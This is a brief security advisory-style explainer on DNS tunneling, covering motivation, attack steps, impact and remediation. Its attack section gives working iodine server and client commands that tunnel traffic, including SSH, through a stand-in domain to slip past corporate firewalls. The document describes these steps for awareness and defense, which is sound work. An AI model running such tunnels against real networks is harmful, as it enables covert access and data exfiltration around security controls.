Tunneling
The process of transporting data from another protocol within one protocol is called protocol tunneling.
The process of transmitting any TCP/UDP package (for example, http, ftp, ssh, etc.) within DNS packages is also called DNS Tunneling.
Why we use DNS protocol for tunneling?
In order to restrict Internet access, protocols such as http, https, and ssh can be blocked on the firewalls of corporate internal networks.
However, usually, no rules are written for DNS packets. It is generally not preferred because it may block normal internal network traffic. Since the DNS request is designed to look up domain names of websites, there are few restrictions on the data it contains.
This system can also be used to smuggle data through a network. The DNS protocol may also be preferred to tunnel malware and other data through a client-server model.
DNS Tunneling Attack
First, we register the A Record and NS record of the domain we will use for the attack. The domain must be set to point to the attacker server to be tunneled.
We open the DNS tunneling connection using the iodined tool on the attacker server.
iodined -c -f 10.0.0.1 -P test t.example.com
Using the -f option will keep the tools running in the foreground.
-P Specifies the password we use for authentication purposes.
-c parameter disables checking the client IP on every request.
We open the DNS tunneling connection on the target (client) machine with the iodine tool.
iodine -I 50 -f -P test t.example.com
-I Sets the maximum interval between requests to prevent DNS timeouts.
We observe that we receive IP via dns0 connection on the target machine.
We connect to the SSH protocol via DNS tunneling connection.
Impact
Data can be injected into DNS query packets and the answers to these queries. With this method, data can be put on the internet without being checked.
An attacker could infect a computer behind the company’s firewall with malware. Since DNS requests are always allowed in and out of the firewall, the infected computer is allowed to send queries to the DNS resolver. The DNS resolver directs the query to the server where the tunnel connection is located. A connection is established between the target machine and the attacker through the DNS resolver, and this tunnel can be used to exfiltrate data or for other malicious purposes.
Since there is no direct connection between the attacker and the target machine, it is more difficult to track the attacker.
Remediation
It is recommended that users’ external domain resolution requests be passed through web proxy and the relevant signatures are activated in IPS systems.
References
https://calebmadrigal.com/dns-tunneling-with-iodine/
https://www.dnssense.com/post/what-is-dns-tunnelling
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
